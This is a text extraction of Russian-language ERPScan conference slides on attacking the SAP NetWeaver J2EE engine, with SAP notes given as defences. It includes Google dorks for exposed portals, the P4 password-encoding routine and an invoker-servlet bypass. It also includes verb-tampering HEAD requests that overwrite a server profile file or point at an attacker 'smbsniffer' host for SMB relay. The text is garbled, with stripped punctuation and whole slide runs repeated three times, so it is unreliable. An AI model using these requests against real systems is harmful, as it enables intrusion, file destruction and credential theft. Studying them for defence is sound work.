20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
